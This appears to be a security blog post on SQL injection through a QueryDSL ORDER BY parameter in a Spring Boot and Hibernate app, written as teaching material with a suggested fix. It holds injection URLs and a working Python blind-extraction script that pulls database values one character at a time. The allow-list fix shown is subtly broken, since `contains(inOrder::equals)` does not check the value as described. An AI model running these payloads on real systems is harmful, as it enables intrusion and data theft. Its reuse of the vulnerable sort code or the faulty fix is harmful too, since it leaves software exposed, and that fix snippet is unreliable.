ORM, huh, what is it good for?

May 31 2021

This article is a look at an example SQL injection in a codebase using QueryDSL (which, inturn, uses Hibernate ORM). ORMs are good for a lot of things, but preventing SQL injection isn’t as automatic as you might think.

ORM frameworks are good for object relational mapping which is a good way to use a relational database back-end and make it look like a bunch of objects, great for things like MVC and json. You know, 21st century data. They’re a good way to break free of database dependence or to write less data retrieval code so you can focus on business logic. They’re also a good way to not have to learn SQL…

One thing you can’t rely on an ORM to do is to entirely protect apps from being exploited through SQL injection. It’s easy to fall into the assumption that your ORM will handle all the escaping and security-related stuff for you; however, while they generally do prevent SQL injection, this isn’t always the case.

The Setup

Let’s get straight to an example using Springboot and QueryDSL. QueryDSL uses JPA, which in turn uses Hibernate, which then talks to the database via good old JDBC. That’s right, sports fans, we’re looking at an injection sink three or four abstraction libraries deep.

Before we get started I need to give a shout-out to eugenp (https://github.com/eugenp) and ipan97 (https://github.com/ipan97) for code to get up to speed on Springboot and Hibernate. This is the codebase I used.

To follow along you’re going to need to set up your own instance of Springboot and QueryDSL and Hibernate and Postgres and Maven and the JDK and a DB docker container and stuffs and things. I’ll wait why you do that, let me know when you’re ready. I’ll go make a coffee, (or more likely roast a turkey - it took me a while). This article is based on a bug I found on a pentest in December last year, so expect anywhere between an hour to six months to set up the test lab.

OK, so first thing I did was edit spring-boot-querydsl-example/src/main/java/com/github/ipan97/springbootquerydslexample/SpringBootQuerydslExampleApplication.java and add a few Users so we have a little more data to work with.

When everything is up and running, hitting the application will give you back data and you can see users:

http://localhost:8080/api/v1/users?search=email:com

[
  {
    "id": "347fe173-9cd7-4b29-a2e6-9d8c84d05170",
    "firstName": "John",
    "lastName": "Doe",
    "email": "[email protected]",
    "age": 21
  },
  {
    "id": "868c7f18-16f3-42c9-b1c7-4808b28e229f",
    "firstName": "Amelia",
    "lastName": "Zabala",
    "email": "[email protected]",
    "age": 21
  },
  {
    "id": "293d8daa-6ddb-4d82-bfe1-d224608a4eff",
    "firstName": "Zeke",
    "lastName": "Anderson",
    "email": "[email protected]",
    "age": 21
  },
  {
    "id": "798d0263-0af9-4220-bc39-e4839a66c149",
    "firstName": "Tom",
    "lastName": "Doe",
    "email": "[email protected]",
    "age": 21
  }
]

This is the data we’ll be working with for this example.

When you access the app, a request is created to access the data object and that gets translated into an SQL query sent to the Postgres instance that actually contains the data. The query that ends up at the Postgres server from the application looks like this:

/* select user
from User user
where lower(user.email) like ?1 escape '!' */ select user0_.id as id1_0_, user0_.age as age2_0_, user0_.email as email3_0_, user0_.first_name as first_na4_0_, user0_.last_name as last_nam5_0_ from users user0_ where lower(user0_.email) like $1 escape '!' 

with com being passed as a parameter to the PGSQL statement.

Now we’re going to expand the functionality a bit, lets add the ability to sort the data that comes back to us.

The original controller/api/v1/UserApiV1Controller.java contains this code to grab the request parameters and handle the query building:

@RequestMapping(method = RequestMethod.GET, value = "/users")
    @ResponseBody
    public Iterable<User> search(@RequestParam(value = "search") String search) {
        UserPredicatesBuilder builder = new UserPredicatesBuilder();

        if (search != null) {
            Pattern pattern = Pattern.compile("(\\w+?)(:|<|>)(\\w+?),");
            Matcher matcher = pattern.matcher(search + ",");
            while (matcher.find()) {
                builder.with(matcher.group(1), matcher.group(2), matcher.group(3));
                System.out.print("-" + matcher.group(0) +"\n");
            }
        }
        BooleanExpression exp = builder.build();
        return userRepository.findAll(exp);

The Bug

We make two little changes to expand the functionality and add a way to sort the data returned. We end up with this:

   @RequestMapping(method = RequestMethod.GET, value = "/users")
    @ResponseBody
    public Iterable<User> search(@RequestParam(value = "search") String search, @RequestParam(value = "sortattr") String inOrder) {
        UserPredicatesBuilder builder = new UserPredicatesBuilder();

        if (search != null) {
            Pattern pattern = Pattern.compile("(\\w+?)(:|<|>)(\\w+?),");
            Matcher matcher = pattern.matcher(search + ",");
            while (matcher.find()) {
                builder.with(matcher.group(1), matcher.group(2), matcher.group(3));
            }
        }

        OrderSpecifier<String> sortOrder = Expressions.stringPath(inOrder).asc();

        BooleanExpression exp = builder.build();
        return userRepository.findAll(exp, sortOrder);
    }

We added a sortattr variable to the request string (line 92), and added an order specifier to our search (line 103). This is the bug analog for the actually-in-real-life vulnerability I discovered. User input was being passed into a QueryDSL order expression.

When we issue a search and include a sortattr parameter the data we get back is nicely sorted, in this case by lastName:

http://localhost:8080/api/v1/users?search=email:com&sortattr=lastName

[
  {
    "id": "658ec532-d155-4fae-84db-b8853f677d0a",
    "firstName": "Zeke",
    "lastName": "Anderson",
    "email": "[email protected]",
    "age": 21
  },
  {
    "id": "0140c587-2612-4024-8844-a231883d4193",
    "firstName": "John",
    "lastName": "Doe",
    "email": "[email protected]",
    "age": 21
  },
  {
    "id": "32ffb234-40b4-436f-9649-7287cd38f317",
    "firstName": "Tom",
    "lastName": "Doe",
    "email": "[email protected]",
    "age": 21
  },
  {
    "id": "c91ad051-e438-45ee-ad8e-5a514c508b10",
    "firstName": "Amelia",
    "lastName": "Zabala",
    "email": "[email protected]",
    "age": 21
  }
]

The query sent to the Postgres server looks like this:

/* select user
from User user
where lower(user.email) like ?1 escape '!'
order by lastName asc */ select user0_.id as id1_0_, user0_.age as age2_0_, user0_.email as email3_0_, user0_.first_name as first_na4_0_, user0_.last_name as last_nam5_0_ from users user0_ where lower(user0_.email) like $1 escape '!' order by user0_.last_name asc 

The new sortattr parameter is translated to the column name that matches the value of the submitted parameter and it’s all stuck on the end of the query as an order by clause. Order by… Hmmm where have I seen that before? (Google SQLi Order by and you get About 492,000 results)

So let’s try something:

http://localhost:8080/api/v1/users?search=john&sortattr=age%20%7c%7c%20(case%20when%20(1=1)%20then%20(firstName)%20else%20(lastName)%20end)

When we test with 1=1: Amelia shows up first. When we test with 1=0: Good ole Zeke rises to the top.

SQL injection confirmed. This is the query sent in the 1=0 example:

/* select user
from User user
order by age || (case when (1=0) then (firstName) else (lastName) end) asc */ select user0_.id as id1_0_, user0_.age as age2_0_, user0_.email as email3_0_, user0_.first_name as first_na4_0_, user0_.last_name as last_nam5_0_ from users user0_ order by (user0_.age||case when 1=0 then user0_.first_name else user0_.last_name end) asc

Whatever condition we put in place of 1=1 we now know will return Amelia on top if it’s true and Zeke on top if it’s false.

Expand the injected SQL a little and end up with something like this:

http://localhost:8080/api/v1/users?search=email:com&sortattr=age%20%7c%7c%20(case%20when%20(version()%20like%20'Post%25')%20then%20(firstName)%20else%20(lastName)%20end)

If we put in like 'MSSQL' we see Zeke on top, but if we put Like 'Post' then Amelia is first in line, confirming it’s a Postgres DB…

So let’s write a dirty little exploit for this:

      1 import json
      2 import sys
      3 import requests
      4 done = 0
      5 vstring = ""
      6 tstring = ""
      7 
      8 trueresponse = requests.get("http://localhost:8080/api/v1/users?search=email:com&sortattr=age%20%7c%7c%20(case%20when%20(1=1)%20then%20(firstName)%20else%20(lastName)%20end)")
      9 truequery = json.loads(trueresponse.text)
     10 
     11 print()
     12 print("Working...\n\n")
     13 print()
     14 
     15 while done == 0:
     16         i = 32
     17         length = len(vstring)
     18         while i < 127:
     19                 input_char = chr(i);
     20                 if input_char == '%':
     21                         input_char = "\\%"
     22                 if input_char == '_':
     23                         input_char = "\\_"
     24                 tstring = vstring + input_char
     25                 payload = {'search':'email:com','sortattr':"age || (case when ("+sys.argv[1]+" like \'"+tstring+"%\') then (firstName) else (lastName) end)"}
     26                 currentresponse = requests.get("http://localhost:8080/api/v1/users", params=payload)
     27                 currentquery = json.loads(currentresponse.text)
     28                 if truequery == currentquery:
     29                         vstring = vstring + chr(i)
     30                         print(vstring, end = '\r')
     31                         break
     32                 else:
     33                         i += 1
     34         if length == len(vstring):
     35                 # went through all chars and found nothing new, we are done here
     36                 print()
     37                 print()
     38                 print()
     39                 break

Here’s what this does:

  • Line 8 and 9 get a true result from the webserver and store it for comparison
  • Line 15 through 34 loop through every possible character.
  • Line 25 does all the heavy lifting. It uses the result of the SQL function passed in sys.arv(1), from the command line, and actually sends the request with the injection. Lastly line 28 checks for a match to the initial query we set which we know returns a true result.

So you can run it like this: python3 exploit.py "Version()"

and you get this:

gif of sweet sweet sploit

Easy yeah?

The Fix?

Not to worry though, we broke it, we can fix it. We need to make sure that straight up user input never ends up directly in our query.

There are a few options, we could validate that the sortattr supplied by the user is a value actually matching a field for the User class, using User.class.getDeclaredField(inOrder) or similar. Object relational mapping, so we have objects, remember? But if you did this, and there were fields in the class that you shouldn’t be able to order by (say… bank account balance), would that be a problem? You could create a sortable annotation that’s added to the fields the user is allowed to sort on and check for that as well, but we’ll leave the Java design patterns up to the Java devs in this article.

The simplest way to validate the sortable parameter is against static a list of allowed values:

     39         Set<String> allowedSort = Set.of("firstName", "lastName", "email");
     40         if (!allowedSort.contains(inOrder::equals))
     41             inOrder = "firstName";
     42         
     43         OrderSpecifier<String> sortOrder = Expressions.stringPath(inOrder).asc();

If we add the lines above we verify the parameter passed by the user matches what we allow for sorting. In this case firstName, lastName and email. If the value submitted by the user is anything other than one of those values, default to firstName.

If we did the same thing for every field entered in the web app by the user, we can ensure that user input makes sense in an allow-list based fashion. Doesn’t exist in the allow-list? Ditch it.


Follow us on LinkedIn